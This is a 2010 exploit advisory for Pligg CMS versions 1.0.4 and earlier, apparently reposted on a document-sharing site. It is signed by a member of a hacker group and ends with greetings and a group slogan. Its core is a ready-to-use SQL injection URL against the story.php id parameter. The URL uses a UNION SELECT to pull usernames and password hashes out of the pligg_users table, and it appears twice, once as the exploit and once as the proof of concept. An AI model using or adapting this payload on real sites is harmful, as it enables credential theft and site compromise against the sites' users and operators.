Pligg CMS story.php id SQL Injection Vulnerability by h3m4n

VIEWS: 134 PAGES: 1

									                               Pligg CMS story.php id SQL Injection Vulnerability                                 Page 1/1
  1    /**************************************************************************
  2
  3    [!]   Pligg CMS (story.php?id) SQL Injection Vulnerability
  4    [!]   Author      : Don Tukulesto (root@indonesiancoder.com)
  5    [!]   Homepage: http://indonesiancoder.com
  6    [!]   Date        : Tue, April 27, 2010
  7    [!]   Tune in     : http://antisecradio.fm (choose your weapon)
  8
  9    **************************************************************************/
  10
  11   [ Software Information ]
  12
  13   [>]   Vendor      : http://www.pligg.com/
  14   [>]   Download: http://www.pligg.com/download/
  15   [>]   Name        : Social Networking Software
  16   [>]   Version : 1.0.4 and previous
  17   [>]   License : GPL
  18   [>]   Type        : Non−Commercial ( open source CMS )
  19   [>]   Method      : SQL Injection
  20
  21   ========================================================
  22
  23   [ Expl0!T ]
  24
  25   http://server/path/story.php?id=2+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user_login,0x3a,u
       ser_pass),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+pligg_users−−
  26
  27   [ Proof of Concept ]
  28
  29   http://[site]/story.php?id=2+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user_login,0x3a,user_p
       ass),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+pligg_users−−
  30
  31   ========================================================
  32
  33   [ Cheers ]
  34
  35   [>] Hussin X found bugs at Plig CMS Version 9.9.0. See reference:
  36       http://www.exploit−db.com/exploits/6146
  37   [>] Indonesian Coder Team − AntiSecurity − ServerIsDown − SurabayaHackerLink
  38   [>] My brother M364TR0N − kaMtiEz − Gonzhack − El N4ck0 − ibl13Z − arianom − YaDoY666 − ./Jack−
  39   [>] neng elv1n4 − xshadow − SAINT − Cyb3r_tr0n − M3NW5 − Pathloader − Mboys − Contrex − amxku − inj3ct0r
  40   [>] xnitro @xtremenitro.org − DraCoola − r3m1ck − Senot − ran − CherCut − Ghambass − CyberSector 31
  41   [>] James Brown & Todd @packetstormsecurity.org − Maksymilian & sp3x @securityreason.com
  42
  43   [ Notes ]
  44
  45   [>] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM




Don Tukulesto                                                                                                      04/28/2010

								
To top